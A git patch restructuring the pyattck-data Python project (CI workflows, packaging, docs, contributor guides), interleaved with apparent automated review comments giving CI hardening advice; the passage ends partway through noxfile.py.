From d179da49c808e2b2772caadd425808da83e432a3 Mon Sep 17 00:00:00 2001 
From: MSAdministrator Date: Thu, 9 Jun 2022 13:46:40 -0500 Subject: [PATCH 1/4] dev: Complete update --- .github/dependabot.yml | 18 + .github/labels.yml | 66 + .github/release-drafter.yml | 29 + .github/workflows/constraints.txt | 5 + .github/workflows/generatepyattckdata.yml | 17 +- .github/workflows/labeler.yml | 19 + .github/workflows/release.yml | 68 + .github/workflows/tests.yml | 143 ++ CODE_OF_CONDUCT.rst | 105 + CONTRIBUTING.rst | 123 + LICENSE.rst | 22 + README.md | 21 +- codecov.yml | 9 + docs/codeofconduct.rst | 1 + docs/conf.py | 14 + docs/contributing.rst | 4 + docs/index.rst | 16 + docs/license.rst | 1 + docs/reference.rst | 9 + docs/requirements.txt | 3 + docs/usage.rst | 6 + noxfile.py | 205 ++ poetry.lock | 2139 +++++++++++++++++ pyattck_data/__init__.py | 2 - pyproject.toml | 83 + src/pyattck_data/__init__.py | 2 + src/pyattck_data/__main__.py | 12 + {pyattck_data => src/pyattck_data}/base.py | 2 +- .../pyattck_data}/data/conversion.json | 0 .../pyattck_data}/generatenistdata.py | 0 .../pyattck_data}/githubcontroller.py | 0 .../pyattck_data}/markdowntable.py | 0 src/pyattck_data/models/__init__.py | 0 src/pyattck_data/models/actor.py | 91 + src/pyattck_data/models/attack.py | 73 + src/pyattck_data/models/base.py | 74 + src/pyattck_data/models/control.py | 33 + src/pyattck_data/models/datacomponent.py | 44 + src/pyattck_data/models/datasource.py | 58 + src/pyattck_data/models/definition.py | 34 + src/pyattck_data/models/generated.py | 299 +++ src/pyattck_data/models/identity.py | 26 + src/pyattck_data/models/malware.py | 123 + src/pyattck_data/models/matrix.py | 33 + src/pyattck_data/models/mitigation.py | 49 + src/pyattck_data/models/nist.py | 74 + src/pyattck_data/models/py.typed | 0 src/pyattck_data/models/relationship.py | 27 + src/pyattck_data/models/tactic.py | 53 + src/pyattck_data/models/technique.py | 156 ++ src/pyattck_data/models/tool.py | 125 + src/pyattck_data/models/types.py | 165 ++ .../pyattck_data}/pyattckdata.py | 2 +- 
.../pyattck_data}/services/__init__.py | 0 .../services/adversaryemulation.py | 0 .../services/aptthreattracking.py | 2 +- .../pyattck_data}/services/atomicredteam.py | 0 .../services/atomicthreatcoverage.py | 0 .../services/attckdatasources.py | 0 .../pyattck_data}/services/attckempire.py | 0 .../pyattck_data}/services/blueteamlabs.py | 0 .../pyattck_data}/services/c2matrix.py | 0 .../pyattck_data}/services/elemental.py | 0 .../pyattck_data}/services/litmustest.py | 0 .../services/macosattackdataset.py | 0 .../services/malwarearchaeology.py | 0 .../services/newbeeattackdata.py | 0 .../pyattck_data}/services/nsmattck.py | 0 .../pyattck_data}/services/osqueryattack.py | 0 .../pyattck_data}/services/stockpile.py | 0 .../pyattck_data}/services/sysmonhunter.py | 0 .../services/threathuntingbook.py | 0 .../services/threathuntingtables.py | 0 tests/__init__.py | 1 + tests/test_each_model.py | 53 + tests/test_generated_methods.py | 264 ++ tests/test_main.py | 17 + tests/test_models.py | 120 + tests/test_types.py | 63 + 79 files changed, 5191 insertions(+), 12 deletions(-) create mode 100644 .github/dependabot.yml create mode 100644 .github/labels.yml create mode 100644 .github/release-drafter.yml create mode 100644 .github/workflows/constraints.txt create mode 100644 .github/workflows/labeler.yml create mode 100644 .github/workflows/release.yml create mode 100644 .github/workflows/tests.yml create mode 100644 CODE_OF_CONDUCT.rst create mode 100644 CONTRIBUTING.rst create mode 100644 LICENSE.rst create mode 100644 codecov.yml create mode 100644 docs/codeofconduct.rst create mode 100644 docs/conf.py create mode 100644 docs/contributing.rst create mode 100644 docs/index.rst create mode 100644 docs/license.rst create mode 100644 docs/reference.rst create mode 100644 docs/requirements.txt create mode 100644 docs/usage.rst create mode 100644 noxfile.py create mode 100644 poetry.lock delete mode 100644 pyattck_data/__init__.py create mode 100644 pyproject.toml create mode 100644 
src/pyattck_data/__init__.py create mode 100644 src/pyattck_data/__main__.py rename {pyattck_data => src/pyattck_data}/base.py (83%) rename {pyattck_data => src/pyattck_data}/data/conversion.json (100%) rename {pyattck_data => src/pyattck_data}/generatenistdata.py (100%) rename {pyattck_data => src/pyattck_data}/githubcontroller.py (100%) rename {pyattck_data => src/pyattck_data}/markdowntable.py (100%) create mode 100644 src/pyattck_data/models/__init__.py create mode 100644 src/pyattck_data/models/actor.py create mode 100644 src/pyattck_data/models/attack.py create mode 100644 src/pyattck_data/models/base.py create mode 100644 src/pyattck_data/models/control.py create mode 100644 src/pyattck_data/models/datacomponent.py create mode 100644 src/pyattck_data/models/datasource.py create mode 100644 src/pyattck_data/models/definition.py create mode 100644 src/pyattck_data/models/generated.py create mode 100644 src/pyattck_data/models/identity.py create mode 100644 src/pyattck_data/models/malware.py create mode 100644 src/pyattck_data/models/matrix.py create mode 100644 src/pyattck_data/models/mitigation.py create mode 100644 src/pyattck_data/models/nist.py create mode 100644 src/pyattck_data/models/py.typed create mode 100644 src/pyattck_data/models/relationship.py create mode 100644 src/pyattck_data/models/tactic.py create mode 100644 src/pyattck_data/models/technique.py create mode 100644 src/pyattck_data/models/tool.py create mode 100644 src/pyattck_data/models/types.py rename {pyattck_data => src/pyattck_data}/pyattckdata.py (100%) rename {pyattck_data => src/pyattck_data}/services/__init__.py (100%) rename {pyattck_data => src/pyattck_data}/services/adversaryemulation.py (100%) rename {pyattck_data => src/pyattck_data}/services/aptthreattracking.py (99%) rename {pyattck_data => src/pyattck_data}/services/atomicredteam.py (100%) rename {pyattck_data => src/pyattck_data}/services/atomicthreatcoverage.py (100%) rename {pyattck_data => 
src/pyattck_data}/services/attckdatasources.py (100%) rename {pyattck_data => src/pyattck_data}/services/attckempire.py (100%) rename {pyattck_data => src/pyattck_data}/services/blueteamlabs.py (100%) rename {pyattck_data => src/pyattck_data}/services/c2matrix.py (100%) rename {pyattck_data => src/pyattck_data}/services/elemental.py (100%) rename {pyattck_data => src/pyattck_data}/services/litmustest.py (100%) rename {pyattck_data => src/pyattck_data}/services/macosattackdataset.py (100%) rename {pyattck_data => src/pyattck_data}/services/malwarearchaeology.py (100%) rename {pyattck_data => src/pyattck_data}/services/newbeeattackdata.py (100%) rename {pyattck_data => src/pyattck_data}/services/nsmattck.py (100%) rename {pyattck_data => src/pyattck_data}/services/osqueryattack.py (100%) rename {pyattck_data => src/pyattck_data}/services/stockpile.py (100%) rename {pyattck_data => src/pyattck_data}/services/sysmonhunter.py (100%) rename {pyattck_data => src/pyattck_data}/services/threathuntingbook.py (100%) rename {pyattck_data => src/pyattck_data}/services/threathuntingtables.py (100%) create mode 100644 tests/__init__.py create mode 100644 tests/test_each_model.py create mode 100644 tests/test_generated_methods.py create mode 100644 tests/test_main.py create mode 100644 tests/test_models.py create mode 100644 tests/test_types.py diff --git a/.github/dependabot.yml b/.github/dependabot.yml new file mode 100644 index 0000000..a0a5c73 --- /dev/null +++ b/.github/dependabot.yml @@ -0,0 +1,18 @@ +version: 2 +updates: + - package-ecosystem: github-actions + directory: "/" + schedule: + interval: daily + - package-ecosystem: pip + directory: "/.github/workflows" + schedule: + interval: daily + - package-ecosystem: pip + directory: "/docs" + schedule: + interval: daily + - package-ecosystem: pip + directory: "/" + schedule: + interval: daily diff --git a/.github/labels.yml b/.github/labels.yml new file mode 100644 index 0000000..f7f83aa --- /dev/null 
+++ b/.github/labels.yml @@ -0,0 +1,66 @@ +--- +# Labels names are important as they are used by Release Drafter to decide +# regarding where to record them in changelog or if to skip them. +# +# The repository labels will be automatically configured using this file and +# the GitHub Action https://github.com/marketplace/actions/github-labeler. +- name: breaking + description: Breaking Changes + color: bfd4f2 +- name: bug + description: Something isn't working + color: d73a4a +- name: build + description: Build System and Dependencies + color: bfdadc +- name: ci + description: Continuous Integration + color: 4a97d6 +- name: dependencies + description: Pull requests that update a dependency file + color: 0366d6 +- name: documentation + description: Improvements or additions to documentation + color: 0075ca +- name: duplicate + description: This issue or pull request already exists + color: cfd3d7 +- name: enhancement + description: New feature or request + color: a2eeef +- name: github_actions + description: Pull requests that update Github_actions code + color: "000000" +- name: good first issue + description: Good for newcomers + color: 7057ff +- name: help wanted + description: Extra attention is needed + color: 008672 +- name: invalid + description: This doesn't seem right + color: e4e669 +- name: performance + description: Performance + color: "016175" +- name: python + description: Pull requests that update Python code + color: 2b67c6 +- name: question + description: Further information is requested + color: d876e3 +- name: refactoring + description: Refactoring + color: ef67c4 +- name: removal + description: Removals and Deprecations + color: 9ae7ea +- name: style + description: Style + color: c120e5 +- name: testing + description: Testing + color: b1fc6f +- name: wontfix + description: This will not be worked on + color: ffffff diff --git a/.github/release-drafter.yml b/.github/release-drafter.yml new file mode 100644 index 0000000..7a04410 --- /dev/null 
+++ b/.github/release-drafter.yml
@@ -0,0 +1,29 @@
+categories:
+ - title: ":boom: Breaking Changes"
+ label: "breaking"
+ - title: ":rocket: Features"
+ label: "enhancement"
+ - title: ":fire: Removals and Deprecations"
+ label: "removal"
+ - title: ":beetle: Fixes"
+ label: "bug"
+ - title: ":racehorse: Performance"
+ label: "performance"
+ - title: ":rotating_light: Testing"
+ label: "testing"
+ - title: ":construction_worker: Continuous Integration"
+ label: "ci"
+ - title: ":books: Documentation"
+ label: "documentation"
+ - title: ":hammer: Refactoring"
+ label: "refactoring"
+ - title: ":lipstick: Style"
+ label: "style"
+ - title: ":package: Dependencies"
+ labels:
+ - "dependencies"
+ - "build"
+template: |
+ ## Changes
+
+ $CHANGES
diff --git a/.github/workflows/constraints.txt b/.github/workflows/constraints.txt
new file mode 100644
index 0000000..906d5b6
--- /dev/null
+++ b/.github/workflows/constraints.txt
@@ -0,0 +1,5 @@
+pip==22.1.1
+nox==2022.1.7
+nox-poetry==1.0.0
+poetry==1.1.13
+virtualenv==20.14.1
diff --git a/.github/workflows/generatepyattckdata.yml b/.github/workflows/generatepyattckdata.yml
index 336a30f..473487e 100644
--- a/.github/workflows/generatepyattckdata.yml
+++ b/.github/workflows/generatepyattckdata.yml
@@ -16,20 +16,27 @@ jobs: contents: write steps: - - uses: actions/checkout@v2 + - uses: actions/checkout@v2.4.0 - name: Set up Python Environment - uses: actions/setup-python@v1 + uses: actions/setup-python@v2.3.0 with: python-version: 3.8 + - name: Upgrade pip + run: | + pip install --constraint=.github/workflows/constraints.txt pip + pip --version + - name: Install Poetry + run: | + pip install --constraint=.github/workflows/constraints.txt poetry + poetry --version - name: Install dependencies run: | - python -m pip install --upgrade pip - pip install -U -r requirements.txt + poetry install - name: Generate ATTCK Data env: GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} run: | - python run.py + poetry run python run.py - name: Configure AWS Credentials uses: aws-actions/configure-aws-credentials@v1 with: diff --git a/.github/workflows/labeler.yml b/.github/workflows/labeler.yml new file mode 100644 index 0000000..f39cfa6 --- /dev/null +++ b/.github/workflows/labeler.yml @@ -0,0 +1,19 @@ +name: Labeler + +on: + push: + branches: + - main + - master + +jobs: + labeler: + runs-on: ubuntu-latest + steps: + - name: Check out the repository + uses: actions/checkout@v3.0.2 + + - name: Run Labeler + uses: crazy-max/ghaction-github-labeler@v3.1.1 + with: + skip-delete: true diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml new file mode 100644 index 0000000..eb8d835 --- /dev/null +++ b/.github/workflows/release.yml 
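Review bot: The new `uses: actions/checkout@v2.4.0` and `uses: actions/setup-python@v2.3.0` lines pin to release tags, which the action's owner can move or re-point after the fact; for a job that runs with `contents: write` and later configures AWS credentials, pin each third-party action to its full commit SHA and keep the tag as a trailing comment, e.g. `uses: actions/checkout@<commit-sha> # v2.4.0`. The `github-actions` entry added to dependabot.yml in this commit will then keep those SHAs current. The same tag-only pins appear in the new labeler.yml, release.yml and tests.yml workflows. The job's trigger and the AWS upload steps lie outside this hunk.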
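Review bot: The new labeler job declares no `permissions:` block, so its `GITHUB_TOKEN` receives the repository's default scopes (historically read/write on everything) although the step only manages labels. Add an explicit least-privilege grant on the job, `permissions:` with the scopes the github-labeler action documents (its README lists `contents: read` and `issues: write`), and do the same in the other new workflows that also omit it: release.yml, which tags and publishes releases and so needs an explicit `contents: write`, and tests.yml, which needs only `contents: read`.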
@@ -0,0 +1,68 @@
+name: Release
+
+on:
+ push:
+ branches:
+ - main
+
+jobs:
+ release:
+ name: Release
+ runs-on: ubuntu-latest
+ steps:
+ - name: Check out the repository
+ uses: actions/checkout@v3.0.2
+ with:
+ fetch-depth: 2
+
+ - name: Set up Python
+ uses: actions/setup-python@v2.3.0
+ with:
+ python-version: "3.10"
+
+ - name: Upgrade pip
+ run: |
+ pip install --constraint=.github/workflows/constraints.txt pip
+ pip --version
+
+ - name: Install Poetry
+ run: |
+ pip install --constraint=.github/workflows/constraints.txt poetry
+ poetry --version
+
+ - name: Check if there is a parent commit
+ id: check-parent-commit
+ run: |
+ echo "::set-output name=sha::$(git rev-parse --verify --quiet HEAD^)"
+
+ - name: Detect and tag new version
+ id: check-version
+ if: steps.check-parent-commit.outputs.sha
+ uses: salsify/action-detect-and-tag-new-version@v2.0.1
+ with:
+ version-command: |
+ bash -o pipefail -c "poetry version | awk '{ print \$2 }'"
+
+ - name: Bump version for release
+ if: "! steps.check-version.outputs.tag"
+ run: |
+ poetry version patch &&
+ version=$(poetry version | awk '{ print $2 }') &&
+ poetry version $version
+
+ - name: Build package
+ run: |
+ poetry build --ansi
+
+ - name: Publish package on PyPI
+ run: |
+ poetry config http-basic.pypi ${{ secrets.PYPI_USERNAME }} ${{ secrets.PYPI_PASSWORD }}
+ poetry publish
+
+ - name: Publish the release notes
+ uses: release-drafter/release-drafter@v5.20.0
+ with:
+ publish: ${{ steps.check-version.outputs.tag != '' }}
+ tag: ${{ steps.check-version.outputs.tag }}
+ env:
+ GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
diff --git a/.github/workflows/tests.yml b/.github/workflows/tests.yml
new file mode 100644
index 0000000..0168128
--- /dev/null
+++ b/.github/workflows/tests.yml
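Review bot: `poetry config http-basic.pypi ${{ secrets.PYPI_USERNAME }} ${{ secrets.PYPI_PASSWORD }}` in the "Publish package on PyPI" step hands the credentials over as process arguments, where anything that can list processes on the runner can read them and where a traced shell would echo them; give them to Poetry through the step's environment instead, `env:` with `POETRY_HTTP_BASIC_PYPI_USERNAME: ${{ secrets.PYPI_USERNAME }}` and `POETRY_HTTP_BASIC_PYPI_PASSWORD: ${{ secrets.PYPI_PASSWORD }}`, and drop the `poetry config` line (a project-scoped API token via `POETRY_PYPI_TOKEN_PYPI` is narrower still). Separately, the "Bump version for release" step only rewrites the version on the runner, nothing is committed, and the publish step carries no `if:`, so a push to main with no new tag still publishes a patch bump to PyPI that the repository never records. Guard the publish with `if: steps.check-version.outputs.tag` or route untagged builds to a staging index.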
@@ -0,0 +1,143 @@ +name: Tests + +on: + - push + - pull_request + +jobs: + tests: + name: ${{ matrix.session }} ${{ matrix.python }} / ${{ matrix.os }} + runs-on: ${{ matrix.os }} + strategy: + fail-fast: false + matrix: + include: + - { python: "3.10", os: "ubuntu-latest", session: "tests" } + - { python: "3.9", os: "ubuntu-latest", session: "tests" } + - { python: "3.8", os: "ubuntu-latest", session: "tests" } + - { python: "3.7", os: "ubuntu-latest", session: "tests" } + + env: + NOXSESSION: ${{ matrix.session }} + FORCE_COLOR: "1" + PRE_COMMIT_COLOR: "always" + + steps: + - name: Check out the repository + uses: actions/checkout@v2.4.0 + + - name: Set up Python ${{ matrix.python }} + uses: actions/setup-python@v2.3.0 + with: + python-version: ${{ matrix.python }} + + - name: Upgrade pip + run: | + pip install --constraint=.github/workflows/constraints.txt pip + pip --version + + - name: Upgrade pip in virtual environments + shell: python + run: | + import os + import pip + + with open(os.environ["GITHUB_ENV"], mode="a") as io: + print(f"VIRTUALENV_PIP={pip.__version__}", file=io) + + - name: Install Poetry + run: | + pipx install --pip-args=--constraint=.github/workflows/constraints.txt poetry + poetry --version + + - name: Install Nox + run: | + pipx install --pip-args=--constraint=.github/workflows/constraints.txt nox + pipx inject --pip-args=--constraint=.github/workflows/constraints.txt nox nox-poetry + nox --version + + - name: Compute pre-commit cache key + if: matrix.session == 'pre-commit' + id: pre-commit-cache + shell: python + run: | + import hashlib + import sys + + python = "py{}.{}".format(*sys.version_info[:2]) + payload = sys.version.encode() + sys.executable.encode() + digest = hashlib.sha256(payload).hexdigest() + result = "${{ runner.os }}-{}-{}-pre-commit".format(python, digest[:8]) + + print("::set-output name=result::{}".format(result)) + + - name: Restore pre-commit cache + uses: actions/cache@v2.1.7 + if: matrix.session == 'pre-commit' + 
with:
+ path: ~/.cache/pre-commit
+ key: ${{ steps.pre-commit-cache.outputs.result }}-${{ hashFiles('.pre-commit-config.yaml') }}
+ restore-keys: |
+ ${{ steps.pre-commit-cache.outputs.result }}-
+
+ - name: Run Nox
+ run: |
+ nox --force-color --python=${{ matrix.python }}
+
+ - name: Upload coverage data
+ if: always() && matrix.session == 'tests'
+ uses: "actions/upload-artifact@v2.2.4"
+ with:
+ name: coverage-data
+ path: ".coverage.*"
+
+ - name: Upload documentation
+ if: matrix.session == 'docs-build'
+ uses: actions/upload-artifact@v2.2.4
+ with:
+ name: docs
+ path: docs/_build
+
+ coverage:
+ runs-on: ubuntu-latest
+ needs: tests
+ steps:
+ - name: Check out the repository
+ uses: actions/checkout@v2.4.0
+
+ - name: Set up Python
+ uses: actions/setup-python@v2.3.0
+ with:
+ python-version: "3.10"
+
+ - name: Upgrade pip
+ run: |
+ pip install --constraint=.github/workflows/constraints.txt pip
+ pip --version
+
+ - name: Install Poetry
+ run: |
+ pipx install --pip-args=--constraint=.github/workflows/constraints.txt poetry
+ poetry --version
+
+ - name: Install Nox
+ run: |
+ pipx install --pip-args=--constraint=.github/workflows/constraints.txt nox
+ pipx inject --pip-args=--constraint=.github/workflows/constraints.txt nox nox-poetry
+ nox --version
+
+ - name: Download coverage data
+ uses: actions/download-artifact@v2.0.10
+ with:
+ name: coverage-data
+
+ - name: Combine coverage data and display human readable report
+ run: |
+ nox --force-color --session=coverage
+
+ - name: Create coverage report
+ run: |
+ nox --force-color --session=coverage -- xml
+
+ - name: Upload coverage report
+ uses: codecov/codecov-action@v2.1.0
diff --git a/CODE_OF_CONDUCT.rst b/CODE_OF_CONDUCT.rst
new file mode 100644
index 0000000..c6935f8
--- /dev/null
+++ b/CODE_OF_CONDUCT.rst
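Review bot: The matrix in this hunk only contains `session: "tests"` rows, so the steps gated on `matrix.session == 'pre-commit'` (cache key and cache restore) and on `matrix.session == 'docs-build'` (documentation upload) can never execute, and since `NOXSESSION` is set from the matrix the `safety` session declared in the new noxfile, the only dependency-vulnerability scan in this commit, never runs in CI either. Either add the missing rows, e.g. `- { python: "3.10", os: "ubuntu-latest", session: "safety" }` and `- { python: "3.10", os: "ubuntu-latest", session: "pre-commit" }`, or delete the dead conditional steps so the workflow reads as what it actually does. The matrix definition itself is in the part of the hunk on the previous line.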
@@ -0,0 +1,105 @@ +Contributor Covenant Code of Conduct +==================================== + +Our Pledge +---------- + +We as members, contributors, and leaders pledge to make participation in our community a harassment-free experience for everyone, regardless of age, body size, visible or invisible disability, ethnicity, sex characteristics, gender identity and expression, level of experience, education, socio-economic status, nationality, personal appearance, race, religion, or sexual identity and orientation. + +We pledge to act and interact in ways that contribute to an open, welcoming, diverse, inclusive, and healthy community. + + +Our Standards +------------- + +Examples of behavior that contributes to a positive environment for our community include: + +- Demonstrating empathy and kindness toward other people +- Being respectful of differing opinions, viewpoints, and experiences +- Giving and gracefully accepting constructive feedback +- Accepting responsibility and apologizing to those affected by our mistakes, and learning from the experience +- Focusing on what is best not just for us as individuals, but for the overall community + +Examples of unacceptable behavior include: + +- The use of sexualized language or imagery, and sexual attention or + advances of any kind +- Trolling, insulting or derogatory comments, and personal or political attacks +- Public or private harassment +- Publishing others' private information, such as a physical or email + address, without their explicit permission +- Other conduct which could reasonably be considered inappropriate in a + professional setting + +Enforcement Responsibilities +---------------------------- + +Community leaders are responsible for clarifying and enforcing our standards of acceptable behavior and will take appropriate and fair corrective action in response to any behavior that they deem inappropriate, threatening, offensive, or harmful. 
+ +Community leaders have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, and will communicate reasons for moderation decisions when appropriate. + + +Scope +----- + +This Code of Conduct applies within all community spaces, and also applies when an individual is officially representing the community in public spaces. Examples of representing our community include using an official e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. + + +Enforcement +----------- + +Instances of abusive, harassing, or otherwise unacceptable behavior may be reported to the community leaders responsible for enforcement at info@swimlane.com. All complaints will be reviewed and investigated promptly and fairly. + +All community leaders are obligated to respect the privacy and security of the reporter of any incident. + + +Enforcement Guidelines +---------------------- + +Community leaders will follow these Community Impact Guidelines in determining the consequences for any action they deem in violation of this Code of Conduct: + + +1. Correction +~~~~~~~~~~~~~ + +**Community Impact**: Use of inappropriate language or other behavior deemed unprofessional or unwelcome in the community. + +**Consequence**: A private, written warning from community leaders, providing clarity around the nature of the violation and an explanation of why the behavior was inappropriate. A public apology may be requested. + + +2. Warning +~~~~~~~~~~ + +**Community Impact**: A violation through a single incident or series of actions. + +**Consequence**: A warning with consequences for continued behavior. No interaction with the people involved, including unsolicited interaction with those enforcing the Code of Conduct, for a specified period of time. 
This includes avoiding interactions in community spaces as well as external channels like social media. Violating these terms may lead to a temporary or permanent ban. + + +3. Temporary Ban +~~~~~~~~~~~~~~~~ + +**Community Impact**: A serious violation of community standards, including sustained inappropriate behavior. + +**Consequence**: A temporary ban from any sort of interaction or public communication with the community for a specified period of time. No public or private interaction with the people involved, including unsolicited interaction with those enforcing the Code of Conduct, is allowed during this period. Violating these terms may lead to a permanent ban. + + +4. Permanent Ban +~~~~~~~~~~~~~~~~ + +**Community Impact**: Demonstrating a pattern of violation of community standards, including sustained inappropriate behavior, harassment of an individual, or aggression toward or disparagement of classes of individuals. + +**Consequence**: A permanent ban from any sort of public interaction within the community. + + +Attribution +----------- + +This Code of Conduct is adapted from the `Contributor Covenant `__, version 2.0, +available at https://www.contributor-covenant.org/version/2/0/code_of_conduct.html. + +Community Impact Guidelines were inspired by `Mozilla’s code of conduct enforcement ladder `__. + +.. _homepage: https://www.contributor-covenant.org + +For answers to common questions about this code of conduct, see the FAQ at +https://www.contributor-covenant.org/faq. Translations are available at https://www.contributor-covenant.org/translations. diff --git a/CONTRIBUTING.rst b/CONTRIBUTING.rst new file mode 100644 index 0000000..8027b29 --- /dev/null +++ b/CONTRIBUTING.rst 
@@ -0,0 +1,123 @@ +Contributor Guide +================= + +Thank you for your interest in improving this project. +This project is open-source under the `MIT license`_ and +welcomes contributions in the form of bug reports, feature requests, and pull requests. + +Here is a list of important resources for contributors: + +- `Source Code`_ +- `Documentation`_ +- `Issue Tracker`_ +- `Code of Conduct`_ + +.. _MIT license: https://opensource.org/licenses/MIT +.. _Source Code: https://github.com/MSAdministrator/pyattck-data-models +.. _Documentation: https://pyattck-data-models.readthedocs.io/ +.. _Issue Tracker: https://github.com/MSAdministrator/pyattck-data-models/issues + +How to report a bug +------------------- + +Report bugs on the `Issue Tracker`_. + +When filing an issue, make sure to answer these questions: + +- Which operating system and Python version are you using? +- Which version of this project are you using? +- What did you do? +- What did you expect to see? +- What did you see instead? + +The best way to get your bug fixed is to provide a test case, +and/or steps to reproduce the issue. + + +How to request a feature +------------------------ + +Request features on the `Issue Tracker`_. + + +How to set up your development environment +------------------------------------------ + +You need Python 3.7+ and the following tools: + +- Poetry_ +- Nox_ +- nox-poetry_ + +Install the package with development requirements: + +.. code:: console + + $ poetry install + +You can now run an interactive Python session, +or the command-line interface: + +.. code:: console + + $ poetry run python + $ poetry run pyattck-data-models + +.. _Poetry: https://python-poetry.org/ +.. _Nox: https://nox.thea.codes/ +.. _nox-poetry: https://nox-poetry.readthedocs.io/ + + +How to test the project +----------------------- + +Run the full test suite: + +.. code:: console + + $ nox + +List the available Nox sessions: + +.. 
code:: console + + $ nox --list-sessions + +You can also run a specific Nox session. +For example, invoke the unit test suite like this: + +.. code:: console + + $ nox --session=tests + +Unit tests are located in the ``tests`` directory, +and are written using the pytest_ testing framework. + +.. _pytest: https://pytest.readthedocs.io/ + + +How to submit changes +--------------------- + +Open a `pull request`_ to submit changes to this project. + +Your pull request needs to meet the following guidelines for acceptance: + +- The Nox test suite must pass without errors and warnings. +- Include unit tests. This project maintains 100% code coverage. +- If your changes add functionality, update the documentation accordingly. + +Feel free to submit early, though—we can always iterate on this. + +To run linting and code formatting checks before committing your change, you can install pre-commit as a Git hook by running the following command: + +.. code:: console + + $ nox --session=pre-commit -- install + +It is recommended to open an issue before starting work on anything. +This will allow a chance to talk it over with the owners and validate your approach. + +.. _pull request: https://github.com/MSAdministrator/pyattck-data-models/pulls +.. github-only +.. _Code of Conduct: CODE_OF_CONDUCT.rst diff --git a/LICENSE.rst b/LICENSE.rst new file mode 100644 index 0000000..0012eec --- /dev/null +++ b/LICENSE.rst 
@@ -0,0 +1,22 @@ +MIT License +=========== + +Copyright © 2022 Swimlane + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +**The software is provided "as is", without warranty of any kind, express or +implied, including but not limited to the warranties of merchantability, +fitness for a particular purpose and noninfringement. In no event shall the +authors or copyright holders be liable for any claim, damages or other +liability, whether in an action of contract, tort or otherwise, arising from, +out of or in connection with the software or the use or other dealings in the +software.** diff --git a/README.md b/README.md index 584cfaa..007f7e8 100644 --- a/README.md +++ b/README.md @@ -1,10 +1,26 @@ # pyattck-data -[![Generate ATT&CK Data](https://github.com/swimlane/pyattck-data/actions/workflows/generatepyattckdata.yml/badge.svg)](https://github.com/swimlane/pyattck-data/actions/workflows/generatepyattckdata.yml) +PyPI +Status +Python Version +License +Tests +Codecov +pre-commit +Black + +# + +## Features + +Includes data models for the following projects: + +* [pyattck](https://github.com/swimlane/pyattck/) + This repository contains generated contextual data utilized by pyattck. -# Data Access +## Generated Data Access Generated data can be retrieved from the following URLs: 
@@ -17,6 +33,7 @@ Generated data can be retrieved from the following URLs: * generated_attck_data.json - [https://swimlane-pyattck.s3.us-west-2.amazonaws.com/generated_attck_data.json](https://swimlane-pyattck.s3.us-west-2.amazonaws.com/generated_attck_data.json) * generated_attck_data_v2.json - [https://swimlane-pyattck.s3.us-west-2.amazonaws.com/generated_attck_data_v2.json](https://swimlane-pyattck.s3.us-west-2.amazonaws.com/generated_attck_data_v2.json) + # Generated ATT&CK Datasets This page outlines and provides detailed information regarding the data generated and used with the `pyattck` python package. diff --git a/codecov.yml b/codecov.yml new file mode 100644 index 0000000..bf5a91b --- /dev/null +++ b/codecov.yml @@ -0,0 +1,9 @@ +comment: false +coverage: + status: + project: + default: + target: "65" + patch: + default: + target: "65" diff --git a/docs/codeofconduct.rst b/docs/codeofconduct.rst new file mode 100644 index 0000000..96e0ba2 --- /dev/null +++ b/docs/codeofconduct.rst @@ -0,0 +1 @@ +.. include:: ../CODE_OF_CONDUCT.rst diff --git a/docs/conf.py b/docs/conf.py new file mode 100644 index 0000000..a68a9df --- /dev/null +++ b/docs/conf.py @@ -0,0 +1,14 @@ +"""Sphinx configuration.""" +from datetime import datetime + + +project = "Pyattck Data" +author = "Swimlane" +copyright = f"{datetime.now().year}, {author}" +extensions = [ + "sphinx.ext.autodoc", + "sphinx.ext.napoleon", + "sphinx_click", +] +autodoc_typehints = "description" +html_theme = "furo" diff --git a/docs/contributing.rst b/docs/contributing.rst new file mode 100644 index 0000000..c8670b6 --- /dev/null +++ b/docs/contributing.rst @@ -0,0 +1,4 @@ +.. include:: ../CONTRIBUTING.rst + :end-before: github-only + +.. _Code of Conduct: codeofconduct.html diff --git a/docs/index.rst b/docs/index.rst new file mode 100644 index 0000000..5c575d4 --- /dev/null +++ b/docs/index.rst 
@@ -0,0 +1,16 @@ +.. include:: ../README.rst + :end-before: github-only + +.. _Contributor Guide: contributing.html +.. _Usage: usage.html + +.. toctree:: + :hidden: + :maxdepth: 1 + + usage + reference + contributing + Code of Conduct + License + Changelog diff --git a/docs/license.rst b/docs/license.rst new file mode 100644 index 0000000..68c5792 --- /dev/null +++ b/docs/license.rst @@ -0,0 +1 @@ +.. include:: ../LICENSE.rst diff --git a/docs/reference.rst b/docs/reference.rst new file mode 100644 index 0000000..a3d57fe --- /dev/null +++ b/docs/reference.rst @@ -0,0 +1,9 @@ +Reference +========= + + +pyattck_data +------------------- + +.. automodule:: pyattck_data + :members: diff --git a/docs/requirements.txt b/docs/requirements.txt new file mode 100644 index 0000000..ed606f6 --- /dev/null +++ b/docs/requirements.txt @@ -0,0 +1,3 @@ +furo==2022.4.7 +sphinx==4.5.0 +sphinx-click==4.0.3 diff --git a/docs/usage.rst b/docs/usage.rst new file mode 100644 index 0000000..848a07b --- /dev/null +++ b/docs/usage.rst @@ -0,0 +1,6 @@ +Usage +===== + +.. click:: pyattck_data.__main__:main + :prog: pyattck-data + :nested: full diff --git a/noxfile.py b/noxfile.py new file mode 100644 index 0000000..e2367ff --- /dev/null +++ b/noxfile.py 
@@ -0,0 +1,205 @@
+"""Nox sessions."""
+import os
+import shutil
+import sys
+from pathlib import Path
+from textwrap import dedent
+
+import nox
+
+try:
+ from nox_poetry import Session
+ from nox_poetry import session
+except ImportError:
+ message = f"""\
+ Nox failed to import the 'nox-poetry' package.
+
+ Please install it using the following command:
+
+ {sys.executable} -m pip install nox-poetry"""
+ raise SystemExit(dedent(message)) from None
+
+
+package = "pyattck_data"
+python_versions = ["3.10", "3.9", "3.8", "3.7"]
